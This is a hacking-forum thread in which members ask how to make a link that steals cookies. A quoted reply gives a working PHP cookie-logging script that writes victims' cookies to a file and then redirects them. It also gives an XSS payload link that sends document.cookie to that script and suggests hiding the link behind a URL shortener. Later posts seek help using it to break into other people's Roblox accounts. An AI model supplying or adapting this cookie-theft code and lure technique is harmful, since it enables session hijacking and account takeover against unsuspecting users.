Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 6015

Is it possible to make a cookie grabber using a link?

by Shiina - 21 March, 2020 - 11:30 PM
This post is by a banned member (Shiina) - Unhide
Shiina  
Supreme
475
Posts
208
Threads
4 Years of service
#1
Is it?.?
Dont Be a Leecher Make Sure To Like Or Banned
[Image: giphy.gif]


 
This post is by a banned member (Yooko) - Unhide
Yooko  
Retired Staff
1.097
Posts
116
Threads
6 Years of service
#2
I think so using javascript console code?
This post is by a banned member (Shiina) - Unhide
Shiina  
Supreme
475
Posts
208
Threads
4 Years of service
#3
(22 March, 2020 - 11:22 PM)adblock Wrote: Show More
Yes with XSS faille

you have to direct the user to a page by taking his cookies in the process, and then we save his cookies and redirect him to the destination of our choice so that he doesn’t suspect anything.

 
Code:
?php

if(isset($_GET['c']) && is_string($_GET['c']) && !empty($_GET['c'])) {

$referer = $_SERVER['HTTP_REFERER'];
$date = date('d-m-Y \à H\hi');
$data = "From : $referer\r\nDate : $date\r\nCookie : ".htmlentities($_GET['c'])."\r\n------------------------------\r\n";




$handle = fopen('cookies.txt','a');
fwrite($handle, $data);
fclose($handle);




}
// and send the target wherever you want to divert your attention;)

?>
script language="javascript" type="text/javascript">
    window.location.replace("http://www.plop.org");
/script>
To trap our victim, just send him a link like this:
Code:
http://127.0.0.1/microdev/xavier/hacking/vuln.php?message=%3Cscript%3Ewindow.location.replace(%22http://127.0.0.1/microdev/xavier/hacking/volCookies.php?c=%22%2Bdocument.cookie.toString());%3C/script%3E


then you have to hide your link via a shortner so he doesn’t suspect anything


[/code]
[/quote]

Hey so how can i put all that in a link i want for my person? A friend of mine wanted to get into some roblox accs
Dont Be a Leecher Make Sure To Like Or Banned
[Image: giphy.gif]


 
This post is by a banned member (ArtinTheWise) - Unhide
5
Posts
0
Threads
1 Year of service
#4
(This post was last modified: 04 July, 2023 - 12:57 AM by ArtinTheWise. Edited 1 time in total.)
i need help making this for roblox pls :( add me on discord, secretthewise. would be extremely appreciated

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 2 Guest(s)